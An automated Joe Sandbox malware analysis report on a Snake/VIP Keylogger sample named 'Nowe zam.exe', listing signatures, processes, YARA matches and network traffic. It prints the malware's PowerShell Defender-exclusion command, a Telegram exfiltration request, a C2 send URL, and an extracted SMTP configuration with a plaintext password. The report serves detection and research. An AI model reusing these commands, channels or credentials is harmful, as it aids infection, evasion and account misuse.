Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nowe zam.exe

Overview

General Information

Sample name:Nowe zam.exe
Analysis ID:1551046
MD5:d29c5fb95585ed107d8473d204d520ae
SHA1:4a008ac6426aa63e7fbb7ce25810342efaeb6607
SHA256:5a8467ab773f458f57d5942d6fe612c5048c50b19e7d63c82ff1eac99a324e2b
Tags:exeuser-Maciej8910871
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: MSBuild connects to smtp port
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Nowe zam.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\Nowe zam.exe" MD5: D29C5FB95585ED107D8473D204D520AE)
    • powershell.exe (PID: 3800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 1016 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "spletnastran@tlakovec.si", "Password": "@nartsantelps", "Host": "mail.tlakovec.si", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "spletnastran@tlakovec.si", "Password": "@nartsantelps", "Host": "mail.tlakovec.si", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d5df:$a1: get_encryptedPassword
          • 0x2d8fc:$a2: get_encryptedUsername
          • 0x2d3ef:$a3: get_timePasswordChanged
          • 0x2d4f8:$a4: get_passwordField
          • 0x2d5f5:$a5: set_encryptedPassword
          • 0x2ecb8:$a7: get_logins
          • 0x2ec1b:$a10: KeyLoggerEventArgs
          • 0x2e880:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 14 entries
          SourceRuleDescriptionAuthorStrings
          4.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            4.2.MSBuild.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              4.2.MSBuild.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                4.2.MSBuild.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  4.2.MSBuild.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2d7df:$a1: get_encryptedPassword
                  • 0x2dafc:$a2: get_encryptedUsername
                  • 0x2d5ef:$a3: get_timePasswordChanged
                  • 0x2d6f8:$a4: get_passwordField
                  • 0x2d7f5:$a5: set_encryptedPassword
                  • 0x2eeb8:$a7: get_logins
                  • 0x2ee1b:$a10: KeyLoggerEventArgs
                  • 0x2ea80:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 28 entries

                  Networking

                  barindex
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 212.44.112.138, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 1016, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49741

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nowe zam.exe", ParentImage: C:\Users\user\Desktop\Nowe zam.exe, ParentProcessId: 6828, ParentProcessName: Nowe zam.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", ProcessId: 3800, ProcessName: powershell.exe
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 158.101.44.242, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 1016, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49713
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nowe zam.exe", ParentImage: C:\Users\user\Desktop\Nowe zam.exe, ParentProcessId: 6828, ParentProcessName: Nowe zam.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", ProcessId: 3800, ProcessName: powershell.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nowe zam.exe", ParentImage: C:\Users\user\Desktop\Nowe zam.exe, ParentProcessId: 6828, ParentProcessName: Nowe zam.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe", ProcessId: 3800, ProcessName: powershell.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-07T12:49:10.966242+010028033053Unknown Traffic192.168.2.1249716188.114.96.3443TCP
                  2024-11-07T12:49:15.186421+010028033053Unknown Traffic192.168.2.1249724188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-07T12:49:08.847175+010028032742Potentially Bad Traffic192.168.2.1249713158.101.44.24280TCP
                  2024-11-07T12:49:10.237782+010028032742Potentially Bad Traffic192.168.2.1249713158.101.44.24280TCP
                  2024-11-07T12:49:11.659674+010028032742Potentially Bad Traffic192.168.2.1249717158.101.44.24280TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Nowe zam.exeAvira: detected
                  Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "spletnastran@tlakovec.si", "Password": "@nartsantelps", "Host": "mail.tlakovec.si", "Port": "587", "Version": "4.4"}
                  Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "spletnastran@tlakovec.si", "Password": "@nartsantelps", "Host": "mail.tlakovec.si", "Port": "587", "Version": "4.4"}
                  Source: Nowe zam.exeReversingLabs: Detection: 23%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: Nowe zam.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Nowe zam.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49714 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49722 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49733 version: TLS 1.2
                  Source: Nowe zam.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 4x nop then jmp 090D4DF5h0_2_090D48EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 00F2F45Dh4_2_00F2F2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 00F2F45Dh4_2_00F2F4AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 00F2FC19h4_2_00F2F961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065B31E0h4_2_065B2DC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065BE501h4_2_065BE258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065B0D0Dh4_2_065B0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065B1697h4_2_065B0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065B2C19h4_2_065B2968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_065B0673
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065BE0A9h4_2_065BDE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065BE959h4_2_065BE6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065BF209h4_2_065BEF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065BCF49h4_2_065BCCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065BD7F9h4_2_065BD550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065B31E0h4_2_065B2DBF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065BEDB1h4_2_065BEB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065BF661h4_2_065BF3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_065B0853
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_065B0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065BFAB9h4_2_065BF810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065BD3A1h4_2_065BD0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065B31E0h4_2_065B310E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 065BDC51h4_2_065BD9A8

                  Networking

                  barindex
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.12:49741 -> 212.44.112.138:587
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2007/11/2024%20/%2019:53:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                  Source: Joe Sandbox ViewASN Name: DHH-ASSI DHH-ASSI
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49713 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49717 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49724 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49716 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.12:49741 -> 212.44.112.138:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49714 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49722 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2007/11/2024%20/%2019:53:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: mail.tlakovec.si
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 07 Nov 2024 11:49:22 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
